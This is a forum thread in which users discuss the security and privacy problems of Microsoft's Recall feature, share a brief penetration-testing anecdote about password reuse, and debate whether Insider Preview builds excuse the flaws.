• Ephera
      link
      fedilink
      16
      edit-2
      19 days ago

      Man, during my apprenticeship, I spent a month in the offensive security department, meaning white-hat hackers. My most memorable experience there was us scrolling through a WireShark log of a server (which a user had conveniently placed into a web-hosted folder, so that our automated scanners could pick up on it).

      Then we found an unencrypted FTP connection in there, which meant the password got logged in plain text and then we tried the same password for SSH. In roundabout 10 minutes, we had root access. On a real-world system.

      And yeah, watching the guy in the video scroll through those Recall logs, that felt eerily similar. Like you just need the right Ctrl+F, the right screenshot or any clue that they’re using some insecure technology to exploit. If you can extract those logs, it’s likely just a matter of time until you find something.

  • @Moonrise2473
    link
    4419 days ago

    AI taking more jobs.

    Now you just need a execute single PowerShell line to upload the whole history to the attacker, no need to hire skilled hackers to code custom malware or infostealers.

    What those malware devs are going to do now that ai replaced them?

  • m-p{3}
    link
    fedilink
    4220 days ago

    please hack it the fuck out so that it gets canned asap.

    • @Zworf@beehaw.org
      link
      fedilink
      20
      edit-2
      19 days ago

      I don’t think it will.

      Microsoft’s endgame is being the lord and master of AI. AI thrives on knowing more data about the user. What good is an assistant if it doesn’t know your habits, your wishes and desires, your schedule and your attitude towards each person in your life?

      This is not really a feature primarily aimed at helping the user directly (even though it’s currently marketed as such), but to have the AI build up a repository of knowledge about you. Which is hopefully used locally only. For now this seems to be the case, but knowing Microsoft, once they have established themselves as the leading product they will start monetising it in every way possible.

      Of course I’m very unhappy with this too. I’d like to have an AI assistant. But it has to be FOSS, and owned and operated by me. I don’t trust microsoft in any way. I’m already playing around with ollama, RAG scripting etc. It won’t be as good as simply signing up to OpenAI, Google or Microsoft but at least it will be mine.

  • @Hirom@beehaw.org
    link
    fedilink
    23
    edit-2
    20 days ago

    Not surprising. If there’s a way for a non-admin user to use this, it means there’s probably a way for a non-admin process to access the data.

    Even if if were more secure, there’s probably plenty of ways for attackers to escalate privileges to admin.

    The bigger issue is Microsoft providing an official tool for snooping on user activity. Malware won’t have to install their own, and recall taking screenshots periodically won’t be considered anomalous behaviour since it’s an official Microsoft service.

    • @BurningRiver@beehaw.org
      link
      fedilink
      819 days ago

      recall taking screenshots periodically

      Seriously, you didn’t get through the first paragraph?

      the notion of a tool that silently takes a screenshot of your desktop every five seconds”

      Saying “periodically” is a pretty trivial way of putting it.

      Microsoft and Adobe fighting each other over who gets enshittification of the decade award. Sam Altman is probably crafting a victory speech about what chatGPT 12 might possibly be able to do, someday. The sooner all this snake oil hype crashes and burns, the better off we’ll all be.

    • @psud@aussie.zone
      link
      fedilink
      719 days ago

      The article describes a tool that grabs the data without admin privileges, but yes, there are methods used by current malware to escalate privileges.

  • @emerald@beehaw.org
    link
    fedilink
    English
    10
    edit-2
    19 days ago

    I recently listened to the vergecast episode about all of MS’s recent announcements and was genuinely shocked to hear recall being compared to, more or less, the local caching that already happens while you use your computer (+ the normalized big tech tracking). My gut reaction was that that’s kind of an insane thing to think and I’m glad I’m being vindicated on that point.

  • @Pekka@feddit.nl
    link
    fedilink
    819 days ago

    Although this feature sounds helpful, it really looks like they went too far with this. They should probably look for a way to sell these Copilot+ pc’s in another way if they can’t get this secure enough and probably keep it disabled for companies…

    I’m surprised they didn’t make sure that the part that should help you hide sensitive information worked well before letting the first testers get their hands on the feature. All this bad news about the future doesn’t help convince people to turn it on.

    • @jarfil@beehaw.org
      link
      fedilink
      219 days ago

      How were they supposed to test any of it, without releasing it to testers? Recall is an “Insider Preview” feature, it’s nowhere close to a final feature.

      • @Sharp312@lemmy.one
        link
        fedilink
        618 days ago

        From my understanding recall stored the screenshots it took unencrypted. Atleast encrypt the bloody data before releasing it to anyone outside of ms

        • @Meshuggah333@beehaw.org
          link
          fedilink
          518 days ago

          It doesn’t store screenshots, it stores text it gets via OCR from the screenshots in a SQLite database. Still one of the worst ideas these idiots ever had.

          • @jarfil@beehaw.org
            link
            fedilink
            318 days ago

            “Insider Preview” features are proof of concept stuff, they can add encryption before the “Public Preview” version.

        • @jarfil@beehaw.org
          link
          fedilink
          218 days ago

          Insider Preview”

          internal security testing

          Precisely my point.

          If people don’t want to be part of the internal testing, or part of the QA testing, then they shouldn’t be running “Insider” or “Preview” stuff.

          • Vodulas [they/them]
            link
            fedilink
            218 days ago

            Insiders are not MS employees, though. That is also not the same as trained QA or security. You or I can join the insiders program. It is essentially public beta

            • @jarfil@beehaw.org
              link
              fedilink
              218 days ago

              More like alpha. Public beta are the normal (non-Insider) “Preview” versions… then they use a staged update deployment for QA.

              And yes, MS is saving a lot of money on trained employees by using paying customers as testers.

              • Vodulas [they/them]
                link
                fedilink
                118 days ago

                Alpha is For sure more accurate. But for me that also means big security holes like that should be plugged before insider. I’m also a bit biased being a QA engineer